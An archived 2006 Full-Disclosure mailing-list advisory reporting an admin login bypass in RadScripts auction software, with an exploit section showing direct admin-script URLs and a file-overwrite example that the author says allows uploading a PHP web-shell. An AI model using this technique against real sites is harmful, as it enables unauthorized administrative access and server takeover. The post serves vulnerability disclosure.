[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] RadBids Gold, RadLance Gold, RadNics Gold auction products: Admin bypass vulnerability
From: "Duke" <vuln.invent@xxxxxxxxx>
Date: Mon, 24 Jul 2006 14:03:34 +0700

Products: RadBids Gold, RadLance Gold, RadNics Gold auction products

Vendor: RadScripts

URL: http://www.radscripts.com/

VULNERABILITY CLASS: Admin login bypass

[Product Description]

RadBids was designed to give you all the tools needed to rapidly deploy an ebay 
style auction web site solution. Our php 

auction software is simple to deploy and easy to manage. From a web-based 
aministrative panel one can manage all aspects of 

the auction software including categories, users, financial transactions and 
every aspect of the auction software with a few 

clicks of the mouse. 

[Summary]

An attacker can exploit RadScripts Auction Software admin login by entering the 
direct URL to admin scripts.

[Exploit]

http://target.xxx/[product_home]/admin/a_[admin_action_file]

For example:
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]

This can be used overwrite any file on server which has write permissions on 
it. 
For example upload own php web-shell.

[Credits]

INVENT

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] (no subject)
Next by Date: [Full-disclosure] [SECURITY] [DSA 1121-1] New postgrey packages fix denial of service
Previous by thread: [Full-disclosure] Two crash vulnerabilities in Freeciv 2.1.0-beta1 (SVN 15 Jul 2006)
Next by thread: [Full-disclosure] [SECURITY] [DSA 1121-1] New postgrey packages fix denial of service
Index(es):
- Date
- Thread